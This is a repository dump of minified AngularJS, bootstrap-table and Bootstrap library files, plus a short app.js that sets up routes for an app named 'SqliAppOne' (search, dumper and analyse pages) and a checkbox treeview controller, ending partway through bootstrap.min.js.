10 | "$sce",function(a,c,b,f,h,k,r){function l(b){var e=t.current;(x=(p=n())&&e&&p.$$route===e.$$route&&d.equals(p.pathParams,e.pathParams)&&!p.reloadOnSearch&&!v)||!e&&!p||a.$broadcast("$routeChangeStart",p,e).defaultPrevented&&b&&b.preventDefault()}function m(){var w=t.current,e=p;if(x)w.params=e.params,d.copy(w.params,b),a.$broadcast("$routeUpdate",w);else if(e||w)v=!1,(t.current=e)&&e.redirectTo&&(d.isString(e.redirectTo)?c.path(u(e.redirectTo,e.params)).search(e.params).replace():c.url(e.redirectTo(e.pathParams,
11 | c.path(),c.search())).replace()),f.when(e).then(function(){if(e){var a=d.extend({},e.resolve),b,c;d.forEach(a,function(b,e){a[e]=d.isString(b)?h.get(b):h.invoke(b,null,null,e)});d.isDefined(b=e.template)?d.isFunction(b)&&(b=b(e.params)):d.isDefined(c=e.templateUrl)&&(d.isFunction(c)&&(c=c(e.params)),d.isDefined(c)&&(e.loadedTemplateUrl=r.valueOf(c),b=k(c)));d.isDefined(b)&&(a.$template=b);return f.all(a)}}).then(function(c){e==t.current&&(e&&(e.locals=c,d.copy(e.params,b)),a.$broadcast("$routeChangeSuccess",
12 | e,w))},function(b){e==t.current&&a.$broadcast("$routeChangeError",e,w,b)})}function n(){var a,b;d.forEach(g,function(f,g){var q;if(q=!b){var h=c.path();q=f.keys;var l={};if(f.regexp)if(h=f.regexp.exec(h)){for(var k=1,n=h.length;k<n;++k){var m=q[k-1],p=h[k];m&&p&&(l[m.name]=p)}q=l}else q=null;else q=null;q=a=q}q&&(b=s(f,{params:d.extend({},c.search(),a),pathParams:a}),b.$$route=f)});return b||g[null]&&s(g[null],{params:{},pathParams:{}})}function u(a,b){var c=[];d.forEach((a||"").split(":"),function(a,
13 | d){if(0===d)c.push(a);else{var f=a.match(/(\w+)(?:[?*])?(.*)/),g=f[1];c.push(b[g]);c.push(f[2]||"");delete b[g]}});return c.join("")}var v=!1,p,x,t={routes:g,reload:function(){v=!0;var b={defaultPrevented:!1,preventDefault:function(){this.defaultPrevented=!0;v=!1}};a.$evalAsync(function(){l(b);b.defaultPrevented||m()})},updateParams:function(a){if(this.current&&this.current.$$route)a=d.extend({},this.current.params,a),c.path(u(this.current.$$route.originalPath,a)),c.search(a);else throw B("norout");
14 | }};a.$on("$locationChangeStart",l);a.$on("$locationChangeSuccess",m);return t}]}).run(["$route",d.noop]);var B=d.$$minErr("ngRoute");r.provider("$routeParams",function(){this.$get=function(){return{}}});r.directive("ngView",x);r.directive("ngView",A);x.$inject=["$route","$anchorScroll","$animate"];A.$inject=["$compile","$controller","$route"]})(window,window.angular);
15 | 


--------------------------------------------------------------------------------
/app/js/assets/angular-sanitize.min.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  AngularJS v1.4.4
 3 |  (c) 2010-2015 Google, Inc. http://angularjs.org
 4 |  License: MIT
 5 | */
 6 | (function(n,h,p){'use strict';function E(a){var f=[];r(f,h.noop).chars(a);return f.join("")}function g(a,f){var d={},c=a.split(","),b;for(b=0;b<c.length;b++)d[f?h.lowercase(c[b]):c[b]]=!0;return d}function F(a,f){function d(a,b,d,l){b=h.lowercase(b);if(s[b])for(;e.last()&&t[e.last()];)c("",e.last());u[b]&&e.last()==b&&c("",b);(l=v[b]||!!l)||e.push(b);var m={};d.replace(G,function(b,a,f,c,d){m[a]=q(f||c||d||"")});f.start&&f.start(b,m,l)}function c(b,a){var c=0,d;if(a=h.lowercase(a))for(c=e.length-
 7 | 1;0<=c&&e[c]!=a;c--);if(0<=c){for(d=e.length-1;d>=c;d--)f.end&&f.end(e[d]);e.length=c}}"string"!==typeof a&&(a=null===a||"undefined"===typeof a?"":""+a);var b,k,e=[],m=a,l;for(e.last=function(){return e[e.length-1]};a;){l="";k=!0;if(e.last()&&w[e.last()])a=a.replace(new RegExp("([\\W\\w]*)<\\s*\\/\\s*"+e.last()+"[^>]*>","i"),function(a,b){b=b.replace(H,"$1").replace(I,"$1");f.chars&&f.chars(q(b));return""}),c("",e.last());else{if(0===a.indexOf("\x3c!--"))b=a.indexOf("--",4),0<=b&&a.lastIndexOf("--\x3e",
 8 | b)===b&&(f.comment&&f.comment(a.substring(4,b)),a=a.substring(b+3),k=!1);else if(x.test(a)){if(b=a.match(x))a=a.replace(b[0],""),k=!1}else if(J.test(a)){if(b=a.match(y))a=a.substring(b[0].length),b[0].replace(y,c),k=!1}else K.test(a)&&((b=a.match(z))?(b[4]&&(a=a.substring(b[0].length),b[0].replace(z,d)),k=!1):(l+="<",a=a.substring(1)));k&&(b=a.indexOf("<"),l+=0>b?a:a.substring(0,b),a=0>b?"":a.substring(b),f.chars&&f.chars(q(l)))}if(a==m)throw L("badparse",a);m=a}c()}function q(a){if(!a)return"";A.innerHTML=
 9 | a.replace(/</g,"&lt;");return A.textContent}function B(a){return a.replace(/&/g,"&amp;").replace(M,function(a){var d=a.charCodeAt(0);a=a.charCodeAt(1);return"&#"+(1024*(d-55296)+(a-56320)+65536)+";"}).replace(N,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(/</g,"&lt;").replace(/>/g,"&gt;")}function r(a,f){var d=!1,c=h.bind(a,a.push);return{start:function(a,k,e){a=h.lowercase(a);!d&&w[a]&&(d=a);d||!0!==C[a]||(c("<"),c(a),h.forEach(k,function(d,e){var k=h.lowercase(e),g="img"===a&&"src"===k||
10 | "background"===k;!0!==O[k]||!0===D[k]&&!f(d,g)||(c(" "),c(e),c('="'),c(B(d)),c('"'))}),c(e?"/>":">"))},end:function(a){a=h.lowercase(a);d||!0!==C[a]||(c("</"),c(a),c(">"));a==d&&(d=!1)},chars:function(a){d||c(B(a))}}}var L=h.$$minErr("$sanitize"),z=/^<((?:[a-zA-Z])[\w:-]*)((?:\s+[\w:-]+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)\s*(>?)/,y=/^<\/\s*([\w:-]+)[^>]*>/,G=/([\w:-]+)(?:\s*=\s*(?:(?:"((?:[^"])*)")|(?:'((?:[^'])*)')|([^>\s]+)))?/g,K=/^</,J=/^<\//,H=/\x3c!--(.*?)--\x3e/g,x=/<!DOCTYPE([^>]*?)>/i,
11 | I=/<!\[CDATA\[(.*?)]]\x3e/g,M=/[\uD800-\uDBFF][\uDC00-\uDFFF]/g,N=/([^\#-~| |!])/g,v=g("area,br,col,hr,img,wbr");n=g("colgroup,dd,dt,li,p,tbody,td,tfoot,th,thead,tr");p=g("rp,rt");var u=h.extend({},p,n),s=h.extend({},n,g("address,article,aside,blockquote,caption,center,del,dir,div,dl,figure,figcaption,footer,h1,h2,h3,h4,h5,h6,header,hgroup,hr,ins,map,menu,nav,ol,pre,script,section,table,ul")),t=h.extend({},p,g("a,abbr,acronym,b,bdi,bdo,big,br,cite,code,del,dfn,em,font,i,img,ins,kbd,label,map,mark,q,ruby,rp,rt,s,samp,small,span,strike,strong,sub,sup,time,tt,u,var"));
12 | n=g("circle,defs,desc,ellipse,font-face,font-face-name,font-face-src,g,glyph,hkern,image,linearGradient,line,marker,metadata,missing-glyph,mpath,path,polygon,polyline,radialGradient,rect,stop,svg,switch,text,title,tspan,use");var w=g("script,style"),C=h.extend({},v,s,t,u,n),D=g("background,cite,href,longdesc,src,usemap,xlink:href");n=g("abbr,align,alt,axis,bgcolor,border,cellpadding,cellspacing,class,clear,color,cols,colspan,compact,coords,dir,face,headers,height,hreflang,hspace,ismap,lang,language,nohref,nowrap,rel,rev,rows,rowspan,rules,scope,scrolling,shape,size,span,start,summary,tabindex,target,title,type,valign,value,vspace,width");
13 | p=g("accent-height,accumulate,additive,alphabetic,arabic-form,ascent,baseProfile,bbox,begin,by,calcMode,cap-height,class,color,color-rendering,content,cx,cy,d,dx,dy,descent,display,dur,end,fill,fill-rule,font-family,font-size,font-stretch,font-style,font-variant,font-weight,from,fx,fy,g1,g2,glyph-name,gradientUnits,hanging,height,horiz-adv-x,horiz-origin-x,ideographic,k,keyPoints,keySplines,keyTimes,lang,marker-end,marker-mid,marker-start,markerHeight,markerUnits,markerWidth,mathematical,max,min,offset,opacity,orient,origin,overline-position,overline-thickness,panose-1,path,pathLength,points,preserveAspectRatio,r,refX,refY,repeatCount,repeatDur,requiredExtensions,requiredFeatures,restart,rotate,rx,ry,slope,stemh,stemv,stop-color,stop-opacity,strikethrough-position,strikethrough-thickness,stroke,stroke-dasharray,stroke-dashoffset,stroke-linecap,stroke-linejoin,stroke-miterlimit,stroke-opacity,stroke-width,systemLanguage,target,text-anchor,to,transform,type,u1,u2,underline-position,underline-thickness,unicode,unicode-range,units-per-em,values,version,viewBox,visibility,width,widths,x,x-height,x1,x2,xlink:actuate,xlink:arcrole,xlink:role,xlink:show,xlink:title,xlink:type,xml:base,xml:lang,xml:space,xmlns,xmlns:xlink,y,y1,y2,zoomAndPan",
14 | !0);var O=h.extend({},D,p,n),A=document.createElement("pre");h.module("ngSanitize",[]).provider("$sanitize",function(){this.$get=["$$sanitizeUri",function(a){return function(f){var d=[];F(f,r(d,function(c,b){return!/^unsafe/.test(a(c,b))}));return d.join("")}}]});h.module("ngSanitize").filter("linky",["$sanitize",function(a){var f=/((ftp|https?):\/\/|(www\.)|(mailto:)?[A-Za-z0-9._%+-]+@)\S*[^\s.;,(){}<>"\u201d\u2019]/i,d=/^mailto:/i;return function(c,b){function k(a){a&&g.push(E(a))}function e(a,
15 | c){g.push("<a ");h.isDefined(b)&&g.push('target="',b,'" ');g.push('href="',a.replace(/"/g,"&quot;"),'">');k(c);g.push("</a>")}if(!c)return c;for(var m,l=c,g=[],n,p;m=l.match(f);)n=m[0],m[2]||m[4]||(n=(m[3]?"http://":"mailto:")+n),p=m.index,k(l.substr(0,p)),e(n,m[0].replace(d,"")),l=l.substring(p+m[0].length);k(l);return a(g.join(""))}}])})(window,window.angular);
16 | 


--------------------------------------------------------------------------------
/app/js/assets/angular-spinner.min.js:
--------------------------------------------------------------------------------
1 | "format amd";!function(a){"use strict";function b(a,b){return a.module("angularSpinner",[]).constant("SpinJSSpinner",b).provider("usSpinnerConfig",function(){var a={},b={};return{setDefaults:function(b){a=b||a},setTheme:function(a,c){b[a]=c},$get:function(){return{config:a,themes:b}}}}).factory("usSpinnerService",["$rootScope",function(a){var b={};return b.spin=function(b){a.$broadcast("us-spinner:spin",b)},b.stop=function(b){a.$broadcast("us-spinner:stop",b)},b}]).directive("usSpinner",["SpinJSSpinner","usSpinnerConfig",function(b,c){return{scope:!0,link:function(d,e,f){function g(){d.spinner&&d.spinner.stop()}d.spinner=null,d.key=a.isDefined(f.spinnerKey)?f.spinnerKey:!1,d.startActive=a.isDefined(f.spinnerStartActive)?d.$eval(f.spinnerStartActive):d.key?!1:!0,d.spin=function(){d.spinner&&d.spinner.spin(e[0])},d.stop=function(){d.startActive=!1,g()},d.$watch(f.usSpinner,function(h){g(),h=a.extend({},c.config,c.themes[f.spinnerTheme],h),d.spinner=new b(h),d.key&&!d.startActive||f.spinnerOn||d.spinner.spin(e[0])},!0),f.spinnerOn&&d.$watch(f.spinnerOn,function(a){a?d.spin():d.stop()}),d.$on("us-spinner:spin",function(a,b){b===d.key&&d.spin()}),d.$on("us-spinner:stop",function(a,b){b===d.key&&d.stop()}),d.$on("$destroy",function(){d.stop(),d.spinner=null})}}}])}"object"==typeof module&&module.exports?module.exports=b(require("angular"),require("spin.js")):"function"==typeof define&&define.amd?define(["angular","spin"],b):b(a.angular,a.Spinner)}(this);
2 | 


--------------------------------------------------------------------------------
/app/js/assets/app.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  QUADCORE ENGINEERING MSB
 3 | */
 4 | var app = angular.module('SqliAppOne', [ 'ngRoute', 'angularSpinner', 'bsTable', 'ngCookies' ]);
 5 | app.config(function($routeProvider){
 6 | 	$routeProvider
 7 | 		.when('/search/', {templateUrl: 'partials/recherche.html', controller: 'RechercheCtrl'})
 8 | 		.when('/dumper/', {templateUrl: 'partials/dumper.html', controller: 'DumperCtrl'})
 9 | 		.when('/analyse/', {templateUrl: 'partials/analyse.html', controller: 'AnalyseCtrl'})
10 | 		.otherwise({redirectTo : '/search'});
11 | });
12 | 
13 | app.controller('TreeviewController', function($scope) {
14 | 	$scope.onCheck = function(c) {
15 | 	  checkParents(c);
16 | 	  checkChildren(c);
17 | 	}
18 | 
19 | 	var checkParents = function (c)
20 |     {
21 |         var parentLi = c.parents('ul:eq(0)').parents('li:eq(0)');
22 | 
23 |         if (parentLi.length)
24 |         {
25 |             var siblingsChecked = parseInt($('input[type="checkbox"]:checked', c.parents('ul:eq(0)')).length),
26 |                 rootCheckbox = parentLi.find('input[type="checkbox"]:eq(0)');
27 | 
28 |             if (c.is(':checked')){
29 |                 rootCheckbox.prop('checked', true)
30 |             }
31 | 
32 |             checkParents(rootCheckbox);
33 |         }
34 |     }
35 | 
36 |     var checkChildren = function (c)
37 |     {
38 |         var childLi = $('ul li input[type="checkbox"]', c.parents('li:eq(0)'));
39 | 
40 |         if (childLi.length){
41 |             childLi.prop('checked', c.is(':checked'));
42 |         }
43 |     }
44 | 
45 | 	var checkParents = function(c) {
46 | 	  if (c.checked) {
47 | 	    //c.parent.checked = true;
48 | 	  }
49 | 	}
50 | 
51 | 	var checkChildren = function(c) {
52 | 	  if (c.checked) {
53 | 	  	if (c.childs.constructor === Array) {
54 | 		    c.childs.forEach(function (k, v) {
55 | 		      k.checked = true;
56 | 		    });
57 | 		}
58 | 	  } else {
59 | 	    if (c.childs.constructor === Array) {
60 | 	    	c.childs.forEach(function (k, v) {
61 | 		      k.checked = false;
62 | 		    });
63 | 	    }
64 | 	  }
65 | 	}
66 | });
67 | 


--------------------------------------------------------------------------------
/app/js/assets/bootstrap-table-angular.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.10.1 - 2016-02-17
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(){"undefined"!=typeof angular&&angular.module("bsTable",[]).directive("bsTableControl",function(){function a(a){var b;return $.each(f,function(d,e){return e.$el.closest(c).has(a).length?(b=e,!0):void 0}),b}function b(){var a=this,b=a.$s.bsTableControl.state;a.$s.$applyAsync(function(){b.scroll=a.$el.bootstrapTable("getScrollPosition")})}var c=".bootstrap-table",d=".fixed-table-body",e=".search input",f={};return $(window).resize(function(){$.each(f,function(a,b){b.$el.bootstrapTable("resetView")})}),$(document).on("post-header.bs.table",c+" table",function(e){var f=a(e.target);f&&f.$el.closest(c).find(d).on("scroll",b.bind(f))}).on("sort.bs.table",c+" table",function(b,c,d){var e=a(b.target);if(e){var f=e.$s.bsTableControl.state;e.$s.$applyAsync(function(){f.sortName=c,f.sortOrder=d})}}).on("page-change.bs.table",c+" table",function(b,c,d){var e=a(b.target);if(e){var f=e.$s.bsTableControl.state;e.$s.$applyAsync(function(){f.pageNumber=c,f.pageSize=d})}}).on("search.bs.table",c+" table",function(b,c){var d=a(b.target);if(d){var e=d.$s.bsTableControl.state;d.$s.$applyAsync(function(){e.searchText=c})}}).on("focus blur",c+" "+e,function(b){var c=a(b.target);if(c){var d=c.$s.bsTableControl.state;c.$s.$applyAsync(function(){d.searchHasFocus=$(b.target).is(":focus")})}}),{restrict:"EA",scope:{bsTableControl:"="},link:function(a,b){f[a.$id]={$s:a,$el:b};a.instantiated=!1,a.$watch("bsTableControl.options",function(d){d||(d=a.bsTableControl.options={});var f=a.bsTableControl.state||{};a.instantiated&&b.bootstrapTable("destroy"),b.bootstrapTable(angular.extend(angular.copy(d),f)),a.instantiated=!0,"scroll"in f&&b.bootstrapTable("scrollTo",f.scroll),"searchHasFocus"in f&&b.closest(c).find(e).focus()},!0),a.$watch("bsTableControl.state",function(c){c||(c=a.bsTableControl.state={}),b.trigger("directive-updated.bs.table",[c])},!0),a.$on("$destroy",function(){delete f[a.$id]})}}})}();


--------------------------------------------------------------------------------
/app/js/assets/bootstrap-table-cookie.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.10.1 - 2016-02-17
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";var b={sortOrder:"bs.table.sortOrder",sortName:"bs.table.sortName",pageNumber:"bs.table.pageNumber",pageList:"bs.table.pageList",columns:"bs.table.columns",searchText:"bs.table.searchText",filterControl:"bs.table.filterControl"},c=function(a){var b=a.$header;return a.options.height&&(b=a.$tableHeader),b},d=function(a){var b="select, input";return a.options.height&&(b="table select, table input"),b},e=function(){return!!navigator.cookieEnabled},f=function(a,b){for(var c=-1,d=0;d<b.length;d++)if(a.toLowerCase()===b[d].toLowerCase()){c=d;break}return c},g=function(a,b,c){return a.options.cookie&&e()&&""!==a.options.cookieIdTable&&-1!==f(b,a.options.cookiesEnabled)?(b=a.options.cookieIdTable+"."+b,!b||/^(?:expires|max\-age|path|domain|secure)$/i.test(b)?!1:(document.cookie=encodeURIComponent(b)+"="+encodeURIComponent(c)+k(a.options.cookieExpire)+(a.options.cookieDomain?"; domain="+a.options.cookieDomain:"")+(a.options.cookiePath?"; path="+a.options.cookiePath:"")+(a.cookieSecure?"; secure":""),!0)):void 0},h=function(a,b,c){return c?-1===f(c,a.options.cookiesEnabled)?null:(c=b+"."+c,decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*"+encodeURIComponent(c).replace(/[\-\.\+\*]/g,"\\$&")+"\\s*\\=\\s*([^;]*).*$)|^.*$"),"$1"))||null):null},i=function(a){return a?new RegExp("(?:^|;\\s*)"+encodeURIComponent(a).replace(/[\-\.\+\*]/g,"\\$&")+"\\s*\\=").test(document.cookie):!1},j=function(a,b,c,d){return b=a+"."+b,i(b)?(document.cookie=encodeURIComponent(b)+"=; expires=Thu, 01 Jan 1970 00:00:00 GMT"+(d?"; domain="+d:"")+(c?"; path="+c:""),!0):!1},k=function(a){var b=a.replace(/[0-9]*/,"");switch(a=a.replace(/[A-Za-z]/,""),b.toLowerCase()){case"s":a=+a;break;case"mi":a=60*a;break;case"h":a=60*a*60;break;case"d":a=24*a*60*60;break;case"m":a=30*a*24*60*60;break;case"y":a=365*a*24*60*60;break;default:a=void 0}return void 0===a?"":"; max-age="+a};a.extend(a.fn.bootstrapTable.defaults,{cookie:!1,cookieExpire:"2h",cookiePath:null,cookieDomain:null,cookieSecure:null,cookieIdTable:"",cookiesEnabled:["bs.table.sortOrder","bs.table.sortName","bs.table.pageNumber","bs.table.pageList","bs.table.columns","bs.table.searchText","bs.table.filterControl"],filterControls:[],filterControlValuesLoaded:!1}),a.fn.bootstrapTable.methods.push("deleteCookie");var l=a.fn.bootstrapTable.Constructor,m=l.prototype.init,n=l.prototype.initTable,o=l.prototype.onSort,p=l.prototype.onPageNumber,q=l.prototype.onPageListChange,r=l.prototype.onPageFirst,s=l.prototype.onPagePre,t=l.prototype.onPageNext,u=l.prototype.onPageLast,v=l.prototype.toggleColumn,w=l.prototype.selectPage,x=l.prototype.onSearch;l.prototype.init=function(){if(this.options.filterControls=[],this.options.filterControlValuesLoaded=!1,this.options.cookiesEnabled="string"==typeof this.options.cookiesEnabled?this.options.cookiesEnabled.replace("[","").replace("]","").replace(/ /g,"").toLowerCase().split(","):this.options.cookiesEnabled,this.options.filterControl){var e=this;this.$el.on("column-search.bs.table",function(a,c,d){for(var f=!0,h=0;h<e.options.filterControls.length;h++)if(e.options.filterControls[h].field===c){e.options.filterControls[h].text=d,f=!1;break}f&&e.options.filterControls.push({field:c,text:d}),g(e,b.filterControl,JSON.stringify(e.options.filterControls))}).on("post-body.bs.table",function(){setTimeout(function(){if(!e.options.filterControlValuesLoaded){e.options.filterControlValuesLoaded=!0;var f=JSON.parse(h(e,e.options.cookieIdTable,b.filterControl));if(f){var g=null,i=[],j=c(e),k=d(e);j.find(k).each(function(){g=a(this).closest("[data-field]").data("field"),i=a.grep(f,function(a){return a.field===g}),i.length>0&&(a(this).val(i[0].text),e.onColumnSearch({currentTarget:a(this)}))})}}},250)})}m.apply(this,Array.prototype.slice.apply(arguments))},l.prototype.initTable=function(){n.apply(this,Array.prototype.slice.apply(arguments)),this.initCookie()},l.prototype.initCookie=function(){if(this.options.cookie){if(""===this.options.cookieIdTable||""===this.options.cookieExpire||!e())throw new Error("Configuration error. Please review the cookieIdTable, cookieExpire properties, if those properties are ok, then this browser does not support the cookies");var c=h(this,this.options.cookieIdTable,b.sortOrder),d=h(this,this.options.cookieIdTable,b.sortName),f=h(this,this.options.cookieIdTable,b.pageNumber),g=h(this,this.options.cookieIdTable,b.pageList),i=JSON.parse(h(this,this.options.cookieIdTable,b.columns)),j=h(this,this.options.cookieIdTable,b.searchText);this.options.sortOrder=c?c:this.options.sortOrder,this.options.sortName=d?d:this.options.sortName,this.options.pageNumber=f?+f:this.options.pageNumber,this.options.pageSize=g?g===this.options.formatAllRows()?g:+g:this.options.pageSize,this.options.searchText=j?j:"",i&&a.each(this.columns,function(b,c){c.visible=-1!==a.inArray(c.field,i)})}},l.prototype.onSort=function(){o.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.sortOrder,this.options.sortOrder),g(this,b.sortName,this.options.sortName)},l.prototype.onPageNumber=function(){p.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,this.options.pageNumber)},l.prototype.onPageListChange=function(){q.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageList,this.options.pageSize)},l.prototype.onPageFirst=function(){r.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,this.options.pageNumber)},l.prototype.onPagePre=function(){s.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,this.options.pageNumber)},l.prototype.onPageNext=function(){t.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,this.options.pageNumber)},l.prototype.onPageLast=function(){u.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,this.options.pageNumber)},l.prototype.toggleColumn=function(){v.apply(this,Array.prototype.slice.apply(arguments));var c=[];a.each(this.columns,function(a,b){b.visible&&c.push(b.field)}),g(this,b.columns,JSON.stringify(c))},l.prototype.selectPage=function(a){w.apply(this,Array.prototype.slice.apply(arguments)),g(this,b.pageNumber,a)},l.prototype.onSearch=function(){var c=Array.prototype.slice.apply(arguments);x.apply(this,c),a(c[0].currentTarget).parent().hasClass("search")&&g(this,b.searchText,this.searchText)},l.prototype.deleteCookie=function(a){""!==a&&e()&&j(this.options.cookieIdTable,b[a],this.options.cookiePath,this.options.cookieDomain)}}(jQuery);


--------------------------------------------------------------------------------
/app/js/assets/bootstrap-table-export.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.10.1 - 2016-02-17
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";var b=a.fn.bootstrapTable.utils.sprintf,c={json:"JSON",xml:"XML",png:"PNG",csv:"CSV",txt:"TXT",sql:"SQL",doc:"MS-Word",excel:"MS-Excel",powerpoint:"MS-Powerpoint",pdf:"PDF"};a.extend(a.fn.bootstrapTable.defaults,{showExport:!1,exportDataType:"basic",exportTypes:["json","xml","csv","txt","sql","excel"],exportOptions:{}}),a.extend(a.fn.bootstrapTable.defaults.icons,{"export":"glyphicon-export icon-share"});var d=a.fn.bootstrapTable.Constructor,e=d.prototype.initToolbar;d.prototype.initToolbar=function(){if(this.showToolbar=this.options.showExport,e.apply(this,Array.prototype.slice.apply(arguments)),this.options.showExport){var d=this,f=this.$toolbar.find(">.btn-group"),g=f.find("div.export");if(!g.length){g=a(['<div class="export btn-group">','<button class="btn btn-default'+b(" btn-%s",this.options.iconSize)+' dropdown-toggle" data-toggle="dropdown" type="button">',b('<i class="%s %s"></i> ',this.options.iconsPrefix,this.options.icons["export"]),'<span class="caret"></span>',"</button>",'<ul class="dropdown-menu" role="menu">',"</ul>","</div>"].join("")).appendTo(f);var h=g.find(".dropdown-menu"),i=this.options.exportTypes;if("string"==typeof this.options.exportTypes){var j=this.options.exportTypes.slice(1,-1).replace(/ /g,"").split(",");i=[],a.each(j,function(a,b){i.push(b.slice(1,-1))})}a.each(i,function(a,b){c.hasOwnProperty(b)&&h.append(['<li data-type="'+b+'">','<a href="javascript:void(0)">',c[b],"</a>","</li>"].join(""))}),h.find("li").click(function(){var b=a(this).data("type"),c=function(){d.$el.tableExport(a.extend({},d.options.exportOptions,{type:b,escape:!1}))};if("all"===d.options.exportDataType&&d.options.pagination)d.$el.one("load-success.bs.table page-change.bs.table",function(){c(),d.togglePagination()}),d.togglePagination();else if("selected"===d.options.exportDataType){var e=d.getData(),f=d.getAllSelections();d.load(f),c(),d.load(e)}else c()})}}}}(jQuery);


--------------------------------------------------------------------------------
/app/js/assets/bootstrap-table-fr-FR.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.10.1 - 2016-02-17
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";a.fn.bootstrapTable.locales["fr-FR"]={formatLoadingMessage:function(){return"Chargement en cours, patientez, s´il vous plaît ..."},formatRecordsPerPage:function(a){return a+" lignes par page"},formatShowingRows:function(a,b,c){return"Affichage des lignes "+a+" à "+b+" sur "+c+" lignes au total"},formatSearch:function(){return"Rechercher"},formatNoMatches:function(){return"Aucun résultat trouvé"},formatRefresh:function(){return"Rafraîchir"},formatToggle:function(){return"Alterner"},formatColumns:function(){return"Colonnes"},formatAllRows:function(){return"Tous"}},a.extend(a.fn.bootstrapTable.defaults,a.fn.bootstrapTable.locales["fr-FR"])}(jQuery);


--------------------------------------------------------------------------------
/app/js/assets/bootstrap-table-mobile.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.10.1 - 2016-02-17
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";var b=function(b,c){b.options.columnsHidden.length>0&&a.each(b.columns,function(d,e){-1!==b.options.columnsHidden.indexOf(e.field)&&e.visible!==c&&b.toggleColumn(a.fn.bootstrapTable.utils.getFieldIndex(b.columns,e.field),c,!0)})},c=function(a){(a.options.height||a.options.showFooter)&&setTimeout(function(){a.resetView.call(a)},1)},d=function(a,b,d){a.options.minHeight?b<=a.options.minWidth&&d<=a.options.minHeight?e(a):b>a.options.minWidth&&d>a.options.minHeight&&f(a):b<=a.options.minWidth?e(a):b>a.options.minWidth&&f(a),c(a)},e=function(a){g(a,!1),b(a,!1)},f=function(a){g(a,!0),b(a,!0)},g=function(a,b){a.options.cardView=b,a.toggleView()},h=function(a,b){var c;return function(){var d=this,e=arguments,f=function(){c=null,a.apply(d,e)};clearTimeout(c),c=setTimeout(f,b)}};a.extend(a.fn.bootstrapTable.defaults,{mobileResponsive:!1,minWidth:562,minHeight:void 0,heightThreshold:100,checkOnInit:!0,columnsHidden:[]});var i=a.fn.bootstrapTable.Constructor,j=i.prototype.init;i.prototype.init=function(){if(j.apply(this,Array.prototype.slice.apply(arguments)),this.options.mobileResponsive&&this.options.minWidth){this.options.minWidth<100&&this.options.resizable&&(console.log("The minWidth when the resizable extension is active should be greater or equal than 100"),this.options.minWidth=100);var b=this,c={width:a(window).width(),height:a(window).height()};if(a(window).on("resize orientationchange",h(function(){var e=a(this).height(),f=a(this).width();(Math.abs(c.height-e)>b.options.heightThreshold||c.width!=f)&&(d(b,f,e),c={width:f,height:e})},200)),this.options.checkOnInit){var e=a(window).height(),f=a(window).width();d(this,f,e),c={width:f,height:e}}}}}(jQuery);


--------------------------------------------------------------------------------
/app/js/assets/bootstrap.min.js:
--------------------------------------------------------------------------------
1 | if("undefined"==typeof jQuery)throw new Error("Bootstrap requires jQuery");+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one(a.support.transition.end,function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b()})}(jQuery),+function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function c(){f.trigger("closed.bs.alert").remove()}var d=a(this),e=d.attr("data-target");e||(e=d.attr("href"),e=e&&e.replace(/.*(?=#[^\s]*$)/,""));var f=a(e);b&&b.preventDefault(),f.length||(f=d.hasClass("alert")?d:d.parent()),f.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one(a.support.transition.end,c).emulateTransitionEnd(150):c())};var d=a.fn.alert;a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("bs.alert");e||d.data("bs.alert",e=new c(this)),"string"==typeof b&&e[b].call(d)})},a.fn.alert.Constructor=c,a.fn.alert.noConflict=function(){return a.fn.alert=d,this},a(document).on("click.bs.alert.data-api",b,c.prototype.close)}(jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d),this.isLoading=!1};b.DEFAULTS={loadingText:"loading..."},b.prototype.setState=function(b){var 